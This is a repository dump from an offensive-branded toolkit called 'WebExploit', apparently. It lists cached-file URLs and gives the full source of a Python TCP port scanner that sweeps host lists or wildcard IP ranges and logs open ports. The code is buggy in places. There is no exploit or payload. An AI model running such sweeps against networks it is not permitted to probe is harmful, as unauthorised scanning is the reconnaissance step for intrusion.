https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/ril.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/ssc.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/ssc.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/sse.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/sse.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/wpf.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/wpf.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/zipc.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/zipc.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/aps.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | #import re
26 | import time as t
27 | try:
28 | from colorama import Fore as f
29 | from random import choice
30 | import socket
31 | except:
32 | print ('\n\033[3m please run \' pip install -r reqirements.txt \' ')
33 | sys.exit()
34 | import sys, os
35 |
36 | black = "\033[0;30m"
37 | red = "\033[0;31m"
38 | green = "\033[0;32m"
39 | brown = "\033[0;33m"
40 | blue = "\033[0;34m"
41 | purple = "\033[0;35m"
42 | cyan = "\033[0;36m"
43 | l_gray = "\033[0;37m"
44 | dark_gray = "\033[1;30m"
45 | l_red = "\033[1;31m"
46 | l_green = "\033[1;32m"
47 | yellow = "\033[1;33m"
48 | l_blue = "\033[1;34m"
49 | l_purple = "\033[1;35m"
50 | l_cyan = "\033[1;36m"
51 | l_white = "\033[1;37m"
52 | faint = "\033[2m"
53 | italic = "\033[3m"
54 | underline = "\033[4m"
55 | blink = "\033[5m"
56 | nefative = "\033[7m"
57 | cross = "\033[9m"
58 | ended = "\033[0m"
59 | bold = "\033[1m"
60 | nbold = "\033[0m"
61 | white = f.WHITE
62 | bnr = ['''
63 | ░█▀▀▄░▒█▀▀█░▒█▀▀▀█
64 | ▒█▄▄█░▒█▄▄█░░▀▀▀▄▄
65 | ▒█░▒█░▒█░░░░▒█▄▄▄█''', '''
66 |
67 | ▄▄▄ ██▓███ ██████
68 | ▒████▄ ▓██░ ██ ▒██ ▒
69 | ▒██ ▀█▄ ▓██░ ██▓▒░ ▓██▄
70 | ░██▄▄▄▄██▒██▄█▓▒ ▒ ▒ ██▒
71 | ▓█ ▓██▒██▒ ░ ░▒██████▒▒
72 | ▒▒ ▓▒█▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░
73 | ░ ▒▒ ░▒ ░ ░ ░▒ ░
74 | ░ ▒ ░░ ░ ░ ░
75 | ░ ░ ''']
76 |
77 | def r_bnr(bnr):
78 | return choice(bnr)
79 | print(f'{bold}')
80 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
81 | t.sleep(2)
82 | print(f' {italic}From{ended} : ', end='')
83 | print(f'{red}{bold}', end='', flush=True)
84 | #create flush text [simple]
85 | print(f'{bold}W', end='', flush=True)
86 | t.sleep(0.5)
87 | print('e', end='', flush=True)
88 | t.sleep(0.7)
89 | print('b', end='', flush=True)
90 | t.sleep(0.4)
91 | print('E', end='', flush=True)
92 | t.sleep(0.1)
93 | print('x', end='', flush=True)
94 | t.sleep(0.2)
95 | print('p', end='', flush=True)
96 | t.sleep(0.3)
97 | print('l', end='', flush=True)
98 | t.sleep(0.4)
99 | print('o', end='', flush=True)
100 | t.sleep(0.5)
101 | print('i', end='', flush=True)
102 | t.sleep(1.5)
103 | print(f't{ended}', flush=True)
104 | nbold = "\033[0m" # tahe koskholi !
105 | t.sleep(1)
106 |
107 |
108 |
109 | print (f'\n {bold}{f.GREEN}[{f.WHITE}APS{f.GREEN}]{f.WHITE}{f.RED} A.P.S{f.WHITE}{nbold} {bold}A{nbold}dvanced {bold}P{nbold}ort {bold}S{nbold}canner tool !\n\n\n')
110 | t.sleep(3)
111 |
112 | print(f' {f.WHITE}[{f.GREEN}{bold}WebExploit{nbold}{f.WHITE}@{nbold}{f.RED}A.P.S/{f.WHITE}{bold}CONNECTOR{nbold}{f.WHITE}] {bold} Loading {nbold} {bold}{l_blue}CONNECTOR . . .{nbold}\n')
113 | import socket
114 |
115 | def single():
116 | import time as t
117 | while True:
118 | try:
119 | ip_addr = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}IP-ADDRESS{nbold}{f.WHITE} enter \'IP-ADDRESS-{bold}FILE{nbold}\' | (ex: /home/kali/Desktop/hosts.txt) [hosts.txt]:#{f.GREEN}{bold} ')
120 |
121 | if ip_addr:
122 | try:
123 | hosts = open(ip_addr, 'r').read().split()
124 | print (f'\n {f.WHITE}[{f.GREEN}{bold}WebExploit{nbold}{f.WHITE}@{nbold}{f.RED}A.P.S/{f.WHITE}{bold}LOADER{nbold}{f.WHITE}] LOADED {bold} %s {nbold} HOSTS {bold}Successfully...{nbold}\n' % len(hosts))
125 | t.sleep(1)
126 | print (f' {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET{nbold}{f.WHITE}] {f.CYAN}HOSTS-FILE{f.WHITE} >>> {bold}{ip_addr}{nbold}\n')
127 | break
128 |
129 | except Exception as open_error:
130 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} BECAUSE {red}{bold}{open_error}{f.WHITE} .\n')
131 | continue
132 | except KeyboardInterrupt:
133 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
134 | break
135 | break
136 | t.sleep(2)
137 | sys.exit()
138 | sys.exit(0)
139 |
140 | t.sleep(2)
141 |
142 | while True:
143 | try:
144 | port = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}PORT{nbold}{f.WHITE} ENTER \'PORT-NUM\' FOR START A.P.S PORT SCAN | ex:[22, 80, 443, 21]:#{f.GREEN}{bold} ')
145 |
146 | if port:
147 | if int(port) <= 65535:
148 | # defining known ports
149 | if port == '22':
150 | typ = 'ssh'
151 | elif port == '21':
152 | typ = 'ftp'
153 | elif port == '23':
154 | typ = 'telnet'
155 | elif port == '25':
156 | typ = 'smtp'
157 | elif port == '53':
158 | typ = 'dns'
159 | elif port == '80':
160 | typ = 'http'
161 | elif port == '110':
162 | typ = 'pop3'
163 | elif port == '143':
164 | typ = 'imap-4'
165 | elif port == '443':
166 | typ = 'https'
167 | elif port == '67':
168 | typ = 'dhcp'
169 | elif port == '3306':
170 | typ = 'mysql'
171 | elif port == '69':
172 | typ = 'tftp'
173 | elif port == '123':
174 | typ = 'ntp'
175 | elif port == '161': #162
176 | typ = 'snmp'
177 | elif port == '134': # 134 to 140
178 | typ = 'NetBios'
179 | elif port == '445':
180 | typ = 'Microsoft-DS'
181 | elif port == '5432':
182 | typ = 'postgresql'
183 | elif port == '9100':
184 | typ = 'jetdirect'
185 | elif port == '2000':
186 | typ = 'cisco-sccp'
187 | elif port == '5900':
188 | typ = 'vnc'
189 | elif port == '1027':
190 | typ = 'iis'
191 | else:
192 | typ = "unknown"
193 | # end known ports
194 | try:
195 | print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}PORT[S]{nbold}{f.WHITE}] {f.CYAN}SINGLE PORT{f.WHITE} >>>{bold} {port}[{typ}]{nbold} \n')
196 | t.sleep(2)
197 | break
198 | except Exception:
199 | print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}PORT[S]{nbold}{f.WHITE}] {f.CYAN}SINGLE PORT{f.WHITE} >>>{bold} {port}{nbold} \n')
200 | t.sleep(2)
201 | break
202 |
203 | #print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] {bold}INVALID PORT{nbold} EXITTING . . .')
204 | if int(port) > 65535:
205 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Entered {bold}NOT VALID{f.WHITE}{nbold}[{bold}{f.YELLOW}PORT[S]{nbold}{f.WHITE}] PORT ~>{f.WHITE} [{red}{bold}{ip_addr}{nbold}{l_white}].\n')
206 | t.sleep(3)
207 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] {bold}INVALID PORT{nbold} !\n')
208 | t.sleep(2)
209 | continue
210 |
211 | else:
212 | pass
213 | else:
214 | pass
215 |
216 | except KeyboardInterrupt:
217 |
218 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
219 | t.sleep(2)
220 | sys.exit(0)
221 | try:
222 | timeot = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}DELAY{nbold}{f.WHITE} enter \'TIMEOT\' | (ex: 10, 5, 2, 100) [DEFAULT ~> 10]:#{f.CYAN}{bold} ')
223 | print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET{nbold}{f.WHITE}] {f.CYAN}TIMEOUT{f.WHITE} >>> {bold}{timeot}{nbold}\n')
224 |
225 | except Exception:
226 | timeot = 1
227 | # print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET{nbold}{f.WHITE}] {f.CYAN}TIMEOUT{f.WHITE} >>> {bold}{timeot}{nbold}\n')
228 | print (f' {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET-DEFAULT{nbold}{f.WHITE}] {f.CYAN}TIMEOUT{f.WHITE} >>> {bold}1{nbold}\n')
229 | # 2 try ??¿
230 | try:
231 | socket.setdefaulttimeout(int(timeot))
232 | except:
233 | timeot = 1
234 | socket.setdefaulttimeout(timeot)
235 |
236 | path = os.getcwd()
237 |
238 |
239 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}SAVING{bold}{f.GREEN} Results{nbold}{f.WHITE}] IN {f.WHITE}~> [{f.GREEN}{bold}{path}+hosts-aps-{port}-opens.txt{nbold}{f.WHITE}] file !\n')
240 |
241 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}LAUNCH{bold}{f.GREEN} SCANNING . . .{nbold}!\n')
242 |
243 | for single_host in hosts:
244 | try:
245 | socket_connector = socket.create_connection((single_host, int(port)))
246 |
247 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{f.GREEN}OPEN-PORT:{bold}{f.GREEN}{port}{nbold}{f.WHITE}] HOST {f.WHITE}~> [{f.GREEN}{bold}{single_host}{nbold}{f.WHITE}] \n')
248 | with open(path+'hosts-aps-'+port+'-opens.txt', 'a+') as true_host:
249 | true_host.write(single_host+'\n')
250 |
251 | except Exception as host_error:
252 | print (f' {f.WHITE}[{f.RED}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{red}NOT-OPEN-PORT:{bold}{f.GREEN}{port}{nbold}{f.BLUE}] HOST {f.WHITE}~> [{f.RED}{bold}{single_host}{nbold}{f.WHITE}] \n')
253 |
254 | def multi():
255 | import time as t
256 |
257 | while True:
258 | try:
259 | port = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}PORT{nbold}{f.WHITE} enter \'PORT\' FOR START A.P.S PORT SCAN | ex:[21, 22, 80]:#{f.GREEN}{bold} ')
260 |
261 | if port:
262 | if int(port) <= 65535:
263 | # defining known ports
264 | if port == '22':
265 | typ = 'ssh'
266 | elif port == '21':
267 | typ = 'ftp'
268 | elif port == '23':
269 | typ = 'telnet'
270 | elif port == '25':
271 | typ = 'smtp'
272 | elif port == '53':
273 | typ = 'dns'
274 | elif port == '80':
275 | typ = 'http'
276 | elif port == '110':
277 | typ = 'pop3'
278 | elif port == '143':
279 | typ = 'imap-4'
280 | elif port == '443':
281 | typ = 'https'
282 | elif port == '67':
283 | typ = 'dhcp'
284 | elif port == '3306':
285 | typ = 'mysql'
286 | elif port == '69':
287 | typ = 'tftp'
288 | elif port == '123':
289 | typ = 'ntp'
290 | elif port == '161': #162
291 | typ = 'snmp'
292 | elif port == '134': # 134 to 140
293 | typ = 'NetBios'
294 | elif port == '445':
295 | typ = 'Microsoft-DS'
296 | elif port == '5432':
297 | typ = 'postgresql'
298 | elif port == '9100':
299 | typ = 'jetdirect'
300 | elif port == '2000':
301 | typ = 'cisco-sccp'
302 | elif port == '5900':
303 | typ = 'vnc'
304 | elif port == '1027':
305 | typ = 'iis'
306 | else:
307 | typ = "unknown"
308 | # end known ports
309 | try:
310 | print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}PORT[S]{nbold}{f.WHITE}] {f.CYAN}SINGLE PORT{f.WHITE} >>>{bold} {port}[{typ}]{nbold} \n')
311 | t.sleep(2)
312 | break
313 | except KeyboardInterrupt:
314 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
315 | t.sleep(2)
316 | break
317 | sys.exit()
318 |
319 | #print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] {bold}INVALID PORT{nbold} EXITTING . . .')
320 | if int(port) > 65535:
321 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Entered {bold}NOT VALID{f.WHITE}{nbold}[{bold}{f.YELLOW}PORT[S]{nbold}{f.WHITE}] PORT ~>{f.WHITE} [{red}{bold}{ip_addr}{nbold}{l_white}].\n')
322 | t.sleep(3)
323 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] {bold}INVALID PORT{nbold} !\n')
324 | t.sleep(2)
325 | continue
326 |
327 | else:
328 | pass
329 | else:
330 | pass
331 |
332 | except KeyboardInterrupt:
333 |
334 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
335 | t.sleep(2)
336 | sys.exit(0)
337 | try:
338 | print (f'\n {f.WHITE}[{f.RED}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}{bold}TIMEOUT{white} if you set time out more than 10 sec = {red}{bold}ASP{nbold}{white} sleep 10 sec after a scan !\n')
339 | t.sleep(1)
340 | timeot = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}DELAY{nbold}{f.WHITE} enter \'TIMEOT\' | (ex: 10, 5, 2, 100) [DEFAULT ~> 1]:#{f.CYAN}{bold} ')
341 | if timeot:
342 | print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET{nbold}{f.WHITE}] {f.CYAN}TIMEOUT{f.WHITE} >>> {bold}{timeot}{nbold}\n')
343 | else:
344 | timeot = 1
345 |
346 | print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET-DEFAULT{nbold}{f.WHITE}] {f.CYAN}TIMEOUT{f.WHITE} >>> {bold}1{nbold}\n')
347 |
348 | except KeyboardInterrupt:
349 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
350 | sys.exit(0)
351 | # timeot = 1
352 | #
353 | # print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET-DEFAULT{nbold}{f.WHITE}] {f.CYAN}TIMEOUT{f.WHITE} >>> {bold}1{nbold}\n')
354 | # 2 try ??¿
355 | try:
356 | socket.setdefaulttimeout(int(timeot))
357 | except:
358 | timeot = 1
359 | socket.setdefaulttimeout(timeot)
360 | t.sleep(1)
361 |
362 |
363 |
364 |
365 |
366 | while True:
367 | try:
368 | ip = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}IP-ADDRESS{nbold}{f.WHITE} enter \'IP-{bold}ADDRESS{nbold}\' | (ex: 5.13.*.*) [should ip have \'*\' ! [ the \'*\' range !]]:#{f.GREEN}{bold} ')
369 | t.sleep(1)
370 | ect = ip.count('*')
371 | if ip:
372 | if ect == 1:
373 | print (f'\n {f.WHITE}[{bold}{f.YELLOW}IP{nbold}{f.WHITE}] SET-IP ~>{f.WHITE} [{red}{bold}{ip}{nbold}{f.WHITE}]\n')
374 | break
375 | if ip == None:
376 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} IN {red}{bold}IP:{ip}{f.WHITE} max \'*\' == 1 but you entered {str(ect)} {nbold} ! .\n')
377 | continue
378 | if ect > 1:
379 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} IN {red}{bold}IP{f.WHITE} max \'*\' == 1 but you entered {str(ect)} {nbold} ! .\n')
380 | continue
381 | else:
382 | pass
383 | else:
384 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} IN {red}{bold}IP{f.WHITE} plz enter a IPv4 {nbold} ! .\n')
385 | continue
386 |
387 | #print (f'\n {f.WHITE}[{bold}{f.YELLOW}IP{nbold}{f.WHITE}] SET-IP ~>{f.WHITE} [{red}{bold}{ip}{nbold}{f.WHITE}]\n')
388 |
389 | #except Exception as i_error:
390 | # print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} BECAUSE {red}{bold}{i_error}{f.WHITE} {nbold} ! .\n')
391 | # continue
392 |
393 | except KeyboardInterrupt:
394 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} | EXITTING . . .')
395 | sys.exit()
396 | break
397 | t.sleep(2)
398 | sys.exit(0)
399 |
400 | t.sleep(1)
401 | while True:
402 | try:
403 | ip_range = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}IP-RANGE[1]{nbold}{f.WHITE} enter \'IP-RANGE-{bold}0-255{nbold}\' | (ex: 255) [only type 255 !]:#{f.GREEN}{bold} ')
404 | if int(ip_range) <= 255:
405 | print (f'\n {white}[{bold}{f.YELLOW}IP-RANGE{nbold}{f.WHITE}] RANGE ~>{f.WHITE} [{red}{bold}{ip_range}{nbold}{l_white}].\n')
406 | break
407 | if int(ip_range) > 255 or None:
408 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Entered {bold}MORE THAN{f.WHITE}{nbold}[{bold}{f.YELLOW}RANGE{nbold}{f.WHITE}] Using {bold}DEFAULT{nbold}-RANGE.\n')
409 | t.sleep(1)
410 | print (f'\n {white}[{bold}{f.YELLOW}IP-RANGE-DEFAULT{nbold}{f.WHITE}] RANGE ~>{f.WHITE} [{red}{bold}{ip_range}{nbold}{l_white}].\n')
411 | t.sleep(1)
412 | ip_range = 255
413 | t.sleep(1)
414 | print (f'\n {white}[{bold}{f.YELLOW}ip-RANGE{nbold}{f.WHITE}] RANGE[DEFAULT] ~>{f.WHITE} [{red}{bold}{ip_range}{nbold}{white}].\n')
415 | break
416 | except KeyboardInterrupt:
417 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
418 | break
419 | t.sleep(2)
420 | sys.exit()
421 |
422 | # print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Entered {bold}NOT VALID{f.WHITE}{nbold}[{bold}{f.YELLOW}IP-RANGE{nbold}{f.WHITE}] RANGE ~>{f.WHITE} [{red}{bold} {ip_range} {nbold}{white}].\n')
423 | # t.sleep(2)
424 | # print (f'\n {white}[{bold}{f.YELLOW}IP-RANGE-DEFAULT{nbold}{f.WHITE}] RANGE ~>{f.WHITE} [{red}{bold}255{nbold}{white}].\n')
425 | # ip_range = 255
426 |
427 | ip_range = int(ip_range)
428 | ip_range += 1
429 | if ect == 1:
430 |
431 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}{bold}SET-1-\'*\'{white} Found a \'*\' {nbold}{f.WHITE} in [{ip}] !\n')
432 | t.sleep(1)
433 |
434 | path = os.getcwd()
435 |
436 |
437 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}SAVING{bold}{f.GREEN} Results{nbold}{f.WHITE}] IN {f.WHITE}~> [{f.GREEN}{bold}{path}aps-multi-{port}-opens.txt{nbold}{f.WHITE}] file !\n')
438 |
439 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}LAUNCH{bold}{f.GREEN} SCANNING . . .{nbold}!\n')
440 | t.sleep(1)
441 | for i in range(0, int(ip_range)):
442 | ipq = ip.replace('*', str(i))
443 | try:
444 |
445 | socket_connector = socket.create_connection((str(ipq), int(port)))
446 |
447 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{f.GREEN}OPEN-PORT:{bold}{f.GREEN}{port}{nbold}{f.WHITE}] HOST {f.WHITE}~> [{f.GREEN}{bold}{ipq}{nbold}{f.WHITE}] \n')
448 |
449 | with open(path+'hosts-multi-'+port+'-opens.txt', 'a+') as true_host:
450 | true_host.write(ipq+'\n')
451 |
452 | except Exception as host_error:
453 | print (f' {f.WHITE}[{f.RED}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{red}NOT-OPEN-PORT:{bold}{f.GREEN}{port}{nbold}{f.BLUE}] HOST {f.WHITE}~> [{f.RED}{bold}{ipq}{nbold}{f.WHITE}] \n')
454 |
455 |
456 |
457 |
458 |
459 |
460 |
461 |
462 | while True:
463 | try:
464 | select = input(f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}MODE{nbold}{f.WHITE}| (2 MULTI-WITH-FILE, 1 SINGLE]:#{f.GREEN}{bold} ')
465 |
466 | except Exception as s_e:
467 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} BECAUSE: {bold}[{s_e}] {nbold} EXITTING . . .\n')
468 | t.sleep(2)
469 | break
470 | sys.exit()
471 |
472 |
473 | if select == '1':
474 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}MODE[1]{nbold}{f.WHITE}')
475 | t.sleep(2)
476 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}{bold}Loading{white} MODE 2 [{bold}MULTI-HOST-FILE{nbold}] !\n\n\n')
477 | multi()
478 | if select == '2':
479 | print(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}MODE[2]{nbold}{f.WHITE}')
480 | t.sleep(2)
481 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}{bold}Loading{white} MODE 1 [{bold}SINGLE{nbold}] !\n\n\n')
482 | single()
483 | if select == None:
484 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} MODE {bold}[NOT SELECTED] {red}{nbold} EXITTING . . .\n')
485 | sys.exit()
486 |
487 |
488 |
489 | # if ect == 2:
490 | #
491 | # print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}{bold}SET-2-\'*\'{white} Found TWO-2 \'*\' {nbold}{f.WHITE} in [{ip}] !\n')
492 | # t.sleep(1)
493 | #
494 | # path = os.getcwd()
495 | #
496 | # print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}SAVING{bold}{f.GREEN} Results{nbold}{f.WHITE}] IN {f.WHITE}~> [{f.GREEN}{bold}{path}aps-multi-{port}-opens.txt{nbold}{f.WHITE}] file !\n')
497 | # t.sleep(2)
498 | # print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}LAUNCH{bold}{f.GREEN} SCANNING . . .{nbold}!\n')
499 | # t.sleep(1)
500 | #
501 | #
502 | # for i in range(0, int(ip_range)):
503 | # #ipq = ip.replace('*', str(i))
504 | # for t in range(int(ip_range)):
505 | # ipqq = ip.replace('*', str(t))
506 | # try:
507 | # socket_connector = socket.create_connection((str(ipqq), int(port)))
508 | # print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{f.GREEN}OPEN-PORT:{bold}{f.GREEN}{port}{nbold}{f.WHITE}] HOST {f.WHITE}~> [{f.GREEN}{bold}{ipqq}{nbold}{f.WHITE}] \n')
509 | # with open(path+'hosts-multi-'+port+'-opens.txt', 'a+') as true_host:
510 | # true_host.write(ipqq+'\n')
511 | # except Exception as host_error:
512 | # print (f' {f.WHITE}[{f.RED}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{red}NOT-OPEN-PORT:{bold}{f.GREEN}{port}{nbold}{f.BLUE}] HOST {f.WHITE}~> [{f.RED}{bold}{ipqq}{nbold}[{host_error}]{f.WHITE}] \n')
513 |
514 |
515 |
516 |
517 |
518 |
519 |
520 |
521 | #ip_range2 = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}IP-RANGE[oct[3]]{nbold}{f.WHITE} enter \'IP-RANGE-{bold}0-255{nbold}\' | (ex: 255) [only type 255 !]:#{f.GREEN}{bold} ')
522 |
523 |
524 |
525 |
526 |
527 |
528 |
529 |
530 |
531 |
532 |
533 |
534 |
535 |
536 |
537 |
538 |
539 |
540 |
541 |
542 |
543 |
544 | # print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Entered {bold}NOT VALID{f.WHITE}{nbold}[{bold}{f.YELLOW}IP-ADDR{nbold}{f.WHITE}] NOT VALID {f.WHITE} [{red}{bold}{ip_error}{nbold}{l_white}].\n')
545 | #sys.exit(0)
546 | #print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}iP{nbold}{f.WHITE}] {f.CYAN}TARGET-IP{f.WHITE} >>> {bold}{ip_addr}{nbold}\n')
547 |
548 |
549 | #print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Entered {bold}NOT VALID{f.WHITE}{nbold}[{bold}{f.YELLOW}IP-ADDR{nbold}{f.WHITE}] OUT OF RANGE{f.WHITE} {red}{bold}{ip_error}{nbold}{l_white}.\n')
550 | # g = socket.create_connection(("1.1.1.1",80))
551 |
552 | # socket.setdefaulttimeout(10)
